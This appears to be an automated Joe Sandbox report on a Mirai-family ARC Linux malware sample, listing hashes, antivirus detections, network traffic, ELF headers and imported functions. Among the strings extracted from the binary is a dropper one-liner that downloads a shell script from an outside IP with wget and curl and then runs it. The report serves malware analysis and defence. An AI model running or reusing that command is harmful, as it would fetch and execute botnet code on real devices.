Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
c2c5UPqmCv.elf

Overview

General Information

Sample name:c2c5UPqmCv.elf
renamed because original name is a hash value
Original sample name:5a97614fe6f971d1439cc5c6c907a5ec.elf
Analysis ID:1426702
MD5:5a97614fe6f971d1439cc5c6c907a5ec
SHA1:62ea0d27c0d3fe74222676550fd8616af5d24bfe
SHA256:d6b500f61c776860afd09a3290ef3d5513be5f2f6edca4e43e667789d66af8e7
Tags:32elfmirai
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1426702
Start date and time:2024-04-16 14:10:14 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 22s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:c2c5UPqmCv.elf
renamed because original name is a hash value
Original Sample Name:5a97614fe6f971d1439cc5c6c907a5ec.elf
Detection:MAL
Classification:mal64.troj.linELF@0/0@0/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • No process behavior to analyse as no analysis process or sample was found
Command:/tmp/c2c5UPqmCv.elf
PID:6223
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
c2c5UPqmCv.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: c2c5UPqmCv.elfAvira: detected
    Source: c2c5UPqmCv.elfReversingLabs: Detection: 63%
    Source: c2c5UPqmCv.elfVirustotal: Detection: 39%Perma Link
    Source: c2c5UPqmCv.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://141.98.10.76/booters.sh; curl -O http://141.98.10.76/booters.sh; chmod 777 booters.sh; sh booters.sh
    Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
    Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: c2c5UPqmCv.elfString found in binary or memory: http://141.98.10.76/booters.sh;
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal64.troj.linELF@0/0@0/0

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: c2c5UPqmCv.elf, type: SAMPLE

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: c2c5UPqmCv.elf, type: SAMPLE
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    Path InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    No configs have been found

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    c2c5UPqmCv.elf63%ReversingLabsLinux.Trojan.Mirai
    c2c5UPqmCv.elf40%VirustotalBrowse
    c2c5UPqmCv.elf100%AviraANDROID/AVE.Gafgyt.yepnd
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://141.98.10.76/booters.sh;c2c5UPqmCv.elffalse
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      109.202.202.202IBpwSQBj5F.elfGet hashmaliciousUnknownBrowse
        RKdDvW2Ej9.elfGet hashmaliciousUnknownBrowse
          FKFvBdLW4w.elfGet hashmaliciousUnknownBrowse
            0R5cMr3hYC.elfGet hashmaliciousMiraiBrowse
              EsYYEZTyRn.elfGet hashmaliciousUnknownBrowse
                UMbioLGV6w.elfGet hashmaliciousMiraiBrowse
                  K7jJ48wtn7.elfGet hashmaliciousMiraiBrowse
                    IRtucjku4f.elfGet hashmaliciousMiraiBrowse
                      mefdiI5lZg.elfGet hashmaliciousMiraiBrowse
                        ayNajIZ9RS.elfGet hashmaliciousGafgyt, MiraiBrowse
                          91.189.91.43IBpwSQBj5F.elfGet hashmaliciousUnknownBrowse
                            RKdDvW2Ej9.elfGet hashmaliciousUnknownBrowse
                              FKFvBdLW4w.elfGet hashmaliciousUnknownBrowse
                                0R5cMr3hYC.elfGet hashmaliciousMiraiBrowse
                                  EsYYEZTyRn.elfGet hashmaliciousUnknownBrowse
                                    UMbioLGV6w.elfGet hashmaliciousMiraiBrowse
                                      K7jJ48wtn7.elfGet hashmaliciousMiraiBrowse
                                        IRtucjku4f.elfGet hashmaliciousMiraiBrowse
                                          mefdiI5lZg.elfGet hashmaliciousMiraiBrowse
                                            ayNajIZ9RS.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              91.189.91.42IBpwSQBj5F.elfGet hashmaliciousUnknownBrowse
                                                RKdDvW2Ej9.elfGet hashmaliciousUnknownBrowse
                                                  FKFvBdLW4w.elfGet hashmaliciousUnknownBrowse
                                                    0R5cMr3hYC.elfGet hashmaliciousMiraiBrowse
                                                      EsYYEZTyRn.elfGet hashmaliciousUnknownBrowse
                                                        UMbioLGV6w.elfGet hashmaliciousMiraiBrowse
                                                          K7jJ48wtn7.elfGet hashmaliciousMiraiBrowse
                                                            IRtucjku4f.elfGet hashmaliciousMiraiBrowse
                                                              mefdiI5lZg.elfGet hashmaliciousMiraiBrowse
                                                                ayNajIZ9RS.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  No context
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CANONICAL-ASGBB7cl2k3l7y.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.125.190.26
                                                                  IBpwSQBj5F.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  RKdDvW2Ej9.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  FKFvBdLW4w.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  0R5cMr3hYC.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  1RwK3xpv8R.elfGet hashmaliciousMiraiBrowse
                                                                  • 185.125.190.26
                                                                  EsYYEZTyRn.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  yDoGnvHHFD.elfGet hashmaliciousMiraiBrowse
                                                                  • 185.125.190.26
                                                                  UMbioLGV6w.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  K7jJ48wtn7.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  CANONICAL-ASGBB7cl2k3l7y.elfGet hashmaliciousUnknownBrowse
                                                                  • 185.125.190.26
                                                                  IBpwSQBj5F.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  RKdDvW2Ej9.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  FKFvBdLW4w.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  0R5cMr3hYC.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  1RwK3xpv8R.elfGet hashmaliciousMiraiBrowse
                                                                  • 185.125.190.26
                                                                  EsYYEZTyRn.elfGet hashmaliciousUnknownBrowse
                                                                  • 91.189.91.42
                                                                  yDoGnvHHFD.elfGet hashmaliciousMiraiBrowse
                                                                  • 185.125.190.26
                                                                  UMbioLGV6w.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  K7jJ48wtn7.elfGet hashmaliciousMiraiBrowse
                                                                  • 91.189.91.42
                                                                  INIT7CHIBpwSQBj5F.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  RKdDvW2Ej9.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  FKFvBdLW4w.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  0R5cMr3hYC.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  EsYYEZTyRn.elfGet hashmaliciousUnknownBrowse
                                                                  • 109.202.202.202
                                                                  UMbioLGV6w.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  K7jJ48wtn7.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  IRtucjku4f.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  mefdiI5lZg.elfGet hashmaliciousMiraiBrowse
                                                                  • 109.202.202.202
                                                                  ayNajIZ9RS.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                  • 109.202.202.202
                                                                  No context
                                                                  No context
                                                                  No created / dropped files found
                                                                  File type:ELF 32-bit LSB executable, Synopsys ARCompact ARC700 cores, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, for GNU/Linux 4.8.0, stripped
                                                                  Entropy (8bit):6.402204096166712
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                  File name:c2c5UPqmCv.elf
                                                                  File size:66'936 bytes
                                                                  MD5:5a97614fe6f971d1439cc5c6c907a5ec
                                                                  SHA1:62ea0d27c0d3fe74222676550fd8616af5d24bfe
                                                                  SHA256:d6b500f61c776860afd09a3290ef3d5513be5f2f6edca4e43e667789d66af8e7
                                                                  SHA512:1919ba60f763043eb4e064783f53ab9bf0536b08e1feeef38827b54ff7c81f59a301310903fe48049649525cd9cb4613f94ff6077d4b28f8cff4ce0b1850d27b
                                                                  SSDEEP:768:U2IbHj726e4RXz6UcumFU+tzW1IPhzmZqWBK0q7UqKLEDvNe:UtbD72603U+xW1I5zmXK0q7xKLE
                                                                  TLSH:D76309B51985B3BCEAF10075F44325D528B606283FDCE6E361C7643AEFA4F087269E49
                                                                  File Content Preview:.ELF..............].........4...........4. ...(.........4...4...4.......................4...4...4...................................L...L........ ......D...D...D................ ......T...T...T.......................H...H...H... ... ...........Q.td.......

                                                                  ELF header

                                                                  Class:ELF32
                                                                  Data:2's complement, little endian
                                                                  Version:1 (current)
                                                                  Machine:<unknown>
                                                                  Version Number:0x1
                                                                  Type:EXEC (Executable file)
                                                                  OS/ABI:UNIX - System V
                                                                  ABI Version:0
                                                                  Entry Point Address:0x10cf8
                                                                  Flags:0x403
                                                                  ELF Header Size:52
                                                                  Program Header Offset:52
                                                                  Program Header Size:32
                                                                  Number of Program Headers:8
                                                                  Section Header Offset:66056
                                                                  Section Header Size:40
                                                                  Number of Section Headers:22
                                                                  Header String Table Index:21
                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                  NULL0x00x00x00x00x0000
                                                                  .interpPROGBITS0x101340x1340x140x00x2A001
                                                                  .note.ABI-tagNOTE0x101480x1480x200x00x2A004
                                                                  .hashHASH0x101680x1680x1780x40x2A404
                                                                  .dynsymDYNSYM0x102e00x2e00x3700x100x2A514
                                                                  .dynstrSTRTAB0x106500x6500x1a10x00x2A001
                                                                  .rela.pltRELA0x107f40x7f40x2640xc0x42AI4164
                                                                  .initPROGBITS0x10a580xa580x220x00x6AX001
                                                                  .pltPROGBITS0x10a7c0xa7c0x27c0x00x6AX004
                                                                  .textPROGBITS0x10cf80xcf80xde680x00x6AX004
                                                                  .finiPROGBITS0x1eb600xeb600x160x00x6AX001
                                                                  .rodataPROGBITS0x1eb780xeb780xed00x00x2A004
                                                                  .eh_framePROGBITS0x1fa480xfa480x40x00x2A004
                                                                  .ctorsPROGBITS0x21f440xff440x80x00x3WA004
                                                                  .dtorsPROGBITS0x21f4c0xff4c0x80x00x3WA004
                                                                  .dynamicDYNAMIC0x21f540xff540xa80x80x3WA504
                                                                  .got.pltPROGBITS0x21ffc0xfffc0xd80x00x3WA004
                                                                  .dataPROGBITS0x220d40x100d40x180x00x3WA004
                                                                  .bssNOBITS0x220ec0x100ec0x3240x00x3WA004
                                                                  .commentPROGBITS0x00x100ec0x430x10x30MS001
                                                                  .ARC.attributes<unknown>0x00x1012f0x300x00x0001
                                                                  .shstrtabSTRTAB0x00x1015f0xa90x00x0001
                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                  PHDR0x340x100340x100340x1000x1002.47770x5R E0x4
                                                                  INTERP0x1340x101340x101340x140x143.68420x4R 0x1/lib/ld-uClibc.so.0.interp
                                                                  LOAD0x00x100000x100000xfa4c0xfa4c6.50090x5R E0x2000.interp .note.ABI-tag .hash .dynsym .dynstr .rela.plt .init .plt .text .fini .rodata .eh_frame
                                                                  LOAD0xff440x21f440x21f440x1a80x4cc2.62530x6RW 0x2000.ctors .dtors .dynamic .got.plt .data .bss
                                                                  DYNAMIC0xff540x21f540x21f540xa80xa82.04650x6RW 0x4.dynamic
                                                                  NOTE0x1480x101480x101480x200x201.49880x4R 0x4.note.ABI-tag
                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                                                  GNU_RELRO0xff440x21f440x21f440xbc0xbc2.23090x4R 0x1.ctors .dtors .dynamic
                                                                  TypeMetaValueTag
                                                                  DT_NEEDEDsharedliblibc.so.00x1
                                                                  DT_INITvalue0x10a5c0xc
                                                                  DT_FINIvalue0x1eb640xd
                                                                  DT_HASHvalue0x101680x4
                                                                  DT_STRTABvalue0x106500x5
                                                                  DT_SYMTABvalue0x102e00x6
                                                                  DT_STRSZbytes4170xa
                                                                  DT_SYMENTbytes160xb
                                                                  DT_INITvalue0x10a5c0xc
                                                                  DT_FINIvalue0x1eb640xd
                                                                  DT_DEBUGvalue0x00x15
                                                                  DT_PLTGOTvalue0x10a7c0x3
                                                                  DT_PLTRELSZbytes6120x2
                                                                  DT_PLTRELpltrelDT_RELA0x14
                                                                  DT_JMPRELvalue0x107f40x17
                                                                  DT_NULLvalue0x00x0
                                                                  NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                  .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                  __bss_start.dynsym0x220ec0NOTYPE<unknown>DEFAULT18
                                                                  __errno_location.dynsym0x10c680FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  __uClibc_main.dynsym0x10c080FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  _edata.dynsym0x220ec0NOTYPE<unknown>DEFAULT17
                                                                  _end.dynsym0x224100NOTYPE<unknown>DEFAULT18
                                                                  accept.dynsym0x10b540FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  atoi.dynsym0x10c800FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  bind.dynsym0x10b840FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  calloc.dynsym0x10b600FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  clock.dynsym0x10c980FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  close.dynsym0x10cc80FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  closedir.dynsym0x10cb00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  connect.dynsym0x10aac0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  exit.dynsym0x10c740FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  fcntl.dynsym0x10cbc0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  fork.dynsym0x10bfc0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  free.dynsym0x10cd40FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  getpid.dynsym0x10ad00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  getppid.dynsym0x10c2c0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  getsockname.dynsym0x10cec0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  getsockopt.dynsym0x10c500FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  htonl.dynsym0x10bcc0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  htons.dynsym0x10c5c0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  inet_addr.dynsym0x10b900FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  ioctl.dynsym0x10a940FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  kill.dynsym0x10b780FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  listen.dynsym0x10bf00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  malloc.dynsym0x10af40FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  memmove.dynsym0x10ac40FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  memset.dynsym0x10c140FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  ntohl.dynsym0x10b9c0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  ntohs.dynsym0x10c200FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  open.dynsym0x10c8c0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  opendir.dynsym0x10c440FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  prctl.dynsym0x10adc0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  read.dynsym0x10bc00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  readdir.dynsym0x10b300FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  readlink.dynsym0x10ae80FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  realloc.dynsym0x10be40FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  recv.dynsym0x10aa00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  recvfrom.dynsym0x10b0c0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  select.dynsym0x10b240FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  send.dynsym0x10b480FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  sendto.dynsym0x10bd80FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  setsid.dynsym0x10ca40FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  setsockopt.dynsym0x10ba80FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  sigaddset.dynsym0x10b3c0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  sigemptyset.dynsym0x10ab80FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  signal.dynsym0x10bb40FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  sigprocmask.dynsym0x10ce00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  sleep.dynsym0x10b000FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  socket.dynsym0x10b180FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  time.dynsym0x10c380FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  write.dynsym0x10b6c0FUNC<unknown>DEFAULTSHN_UNDEF
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 16, 2024 14:10:53.620393038 CEST43928443192.168.2.2391.189.91.42
                                                                  Apr 16, 2024 14:10:58.995815039 CEST42836443192.168.2.2391.189.91.43
                                                                  Apr 16, 2024 14:11:00.531578064 CEST4251680192.168.2.23109.202.202.202
                                                                  Apr 16, 2024 14:11:13.841675043 CEST43928443192.168.2.2391.189.91.42
                                                                  Apr 16, 2024 14:11:26.128002882 CEST42836443192.168.2.2391.189.91.43
                                                                  Apr 16, 2024 14:11:30.223500967 CEST4251680192.168.2.23109.202.202.202
                                                                  Apr 16, 2024 14:11:54.795896053 CEST43928443192.168.2.2391.189.91.42

                                                                  System Behavior